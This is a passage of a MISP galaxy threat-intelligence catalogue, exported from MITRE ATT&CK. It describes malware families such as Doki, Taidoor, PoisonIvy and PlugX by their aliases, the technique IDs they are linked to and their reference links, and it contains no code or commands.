[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [Ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)

The tag is: misp-galaxy:mitre-malware="Doki - S0600"

Doki - S0600 is also known as:

Doki

View relationships graph

Doki - S0600 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 4661. Table References
Links
https://attack.mitre.org/software/S0600
https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

HTTPBrowser - S0070

[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)

The tag is: misp-galaxy:mitre-malware="HTTPBrowser - S0070"

HTTPBrowser - S0070 is also known as:

HTTPBrowser
Token Control
HttpDump

View relationships graph

HTTPBrowser - S0070 has relationships with:

similar: misp-galaxy:tool="HTTPBrowser" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 4662. Table References
Links
https://attack.mitre.org/software/S0070
https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

Mivast - S0080

[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)

The tag is: misp-galaxy:mitre-malware="Mivast - S0080"

Mivast - S0080 is also known as:

Mivast

View relationships graph

Mivast - S0080 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 4663. Table References
Links
https://attack.mitre.org/software/S0080
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf
http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2

Hikit - S0009

[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)

The tag is: misp-galaxy:mitre-malware="Hikit - S0009"

Hikit - S0009 is also known as:

Hikit

View relationships graph

Hikit - S0009 has relationships with:

similar: misp-galaxy:tool="Hikit" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"

Table 4664. Table References
Links
https://attack.mitre.org/software/S0009
http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

Rover - S0090

[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)

The tag is: misp-galaxy:mitre-malware="Rover - S0090"

Rover - S0090 is also known as:

Rover

View relationships graph

Rover - S0090 has relationships with:

similar: misp-galaxy:malpedia="Rover" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4665. Table References
Links
https://attack.mitre.org/software/S0090
http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/

Taidoor - S0011

[Taidoor](https://attack.mitre.org/software/S0011) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](https://attack.mitre.org/software/S0011) has primarily been used against Taiwanese government organizations since at least 2010.(Citation: TrendMicro Taidoor)

The tag is: misp-galaxy:mitre-malware="Taidoor - S0011"

Taidoor - S0011 is also known as:

Taidoor

View relationships graph

Taidoor - S0011 has relationships with:

similar: misp-galaxy:tool="Taidoor" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4666. Table References
Links
https://attack.mitre.org/software/S0011
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

WEBC2 - S0109

[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="WEBC2 - S0109"

WEBC2 - S0109 is also known as:

WEBC2

View relationships graph

WEBC2 - S0109 has relationships with:

similar: misp-galaxy:tool="WEBC2" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4667. Table References
Links
https://attack.mitre.org/software/S0109
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Derusbi - S0021

[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)

The tag is: misp-galaxy:mitre-malware="Derusbi - S0021"

Derusbi - S0021 is also known as:

Derusbi
PHOTO

View relationships graph

Derusbi - S0021 has relationships with:

similar: misp-galaxy:tool="Derusbi" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Derusbi (Windows)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4668. Table References
Links
https://attack.mitre.org/software/S0021
http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

JPIN - S0201

[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="JPIN - S0201"

JPIN - S0201 is also known as:

JPIN

View relationships graph

JPIN - S0201 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

Table 4669. Table References
Links
https://attack.mitre.org/software/S0201
https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

PoisonIvy - S0012

[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)

The tag is: misp-galaxy:mitre-malware="PoisonIvy - S0012"

PoisonIvy - S0012 is also known as:

PoisonIvy
Poison Ivy
Darkmoon

View relationships graph

PoisonIvy - S0012 has relationships with:

similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014" with estimative-language:likelihood-probability="almost-certain"

Table 4670. Table References
Links
https://attack.mitre.org/software/S0012
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99
https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign

Nerex - S0210

[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)

The tag is: misp-galaxy:mitre-malware="Nerex - S0210"

Nerex - S0210 is also known as:

Nerex

View relationships graph

Nerex - S0210 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4671. Table References
Links
https://attack.mitre.org/software/S0210
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99

BACKSPACE - S0031

[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="BACKSPACE - S0031"

BACKSPACE - S0031 is also known as:

BACKSPACE
Lecna

View relationships graph

BACKSPACE - S0031 has relationships with:

similar: misp-galaxy:tool="Backspace" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4672. Table References
Links
https://attack.mitre.org/software/S0031
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Dendroid - S0301

[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)

The tag is: misp-galaxy:mitre-malware="Dendroid - S0301"

Dendroid - S0301 is also known as:

Dendroid

View relationships graph

Dendroid - S0301 has relationships with:

similar: misp-galaxy:rat="Dendroid" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

Table 4673. Table References
Links
https://attack.mitre.org/software/S0301
https://blog.lookout.com/blog/2014/03/06/dendroid/

PlugX - S0013

[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="PlugX - S0013"

PlugX - S0013 is also known as:

PlugX
DestroyRAT
Sogu
Kaba
Korplug

View relationships graph

PlugX - S0013 has relationships with:

similar: misp-galaxy:rat="PlugX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
